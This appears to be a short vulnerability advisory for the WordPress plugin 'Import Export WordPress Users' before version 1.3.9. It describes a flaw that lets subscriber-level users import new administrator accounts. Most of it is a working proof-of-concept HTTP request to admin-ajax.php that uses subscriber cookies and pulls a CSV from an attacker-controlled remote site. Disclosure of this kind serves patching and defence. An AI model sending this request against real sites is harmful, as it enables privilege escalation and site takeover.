Import Export WordPress Users < 1.3.9 - Authenticated Arbitrary User Creation

“The flaw allowed anybody with subscriber-level access or above to import new users via a CSV file, including administrative-level users” providing subscriber-level users and above with the ability to escalate their privileges.

PoC

POST /wp-admin/admin-ajax.php?import_page=wordpress_hf_user_csv&step;=3 HTTP/1.1 Host: EXAMPLE.com Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Origin: http://EXAMPLE.com Referer: http://EXAMPLE.com/wp-admin/admin.php?import=wordpress_hf_user_csv&amp;step;=2 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: {SUB+ COOKIES} Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 133 action=user_csv_import_request&file;=http://REMOTESITE.com/USERS.csv&amp;start;_pos=0&amp;end;_pos= PoC video: https://www.youtube.com/watch?v=0ejJwbFJpcU